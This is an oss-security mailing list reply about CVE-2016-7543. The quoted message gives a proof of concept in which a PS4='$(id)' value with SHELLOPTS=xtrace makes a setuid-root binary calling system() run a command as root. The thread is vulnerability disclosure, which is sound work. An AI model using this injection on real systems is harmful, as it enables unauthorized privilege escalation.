Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 26 Sep 2016 16:01:03 -0700
From: Tavis Ormandy <taviso@...xchg8b.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2016-7543 -- bash SHELLOPTS+PS4

up201407890@...nos.dcc.fc.up.pt wrote:

> The recent bash 4.4 patched an old attack vector regarding specially
> crafted SHELLOPTS+PS4 environment variables against bogus setuid binaries
> using system()/popen().
> 
> https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html
> 
> "nn. Shells running as root no longer inherit PS4 from the environment,
> closing a security hole involving PS4 expansion performing command
> substitution."
> 
> # gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }' #
> chmod 4755 ./test # ls -l ./test -rwsr-xr-x. 1 root root 8549 Sep 10 18:06
> ./test # exit $ env -i SHELLOPTS=xtrace PS4='$(id)' ./test uid=0(root) Sat
> Sep 10 18:06:36 WET 2016
> 
> Sorry Tavis :P
> 

Hah, nice work :-)

Tavis.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.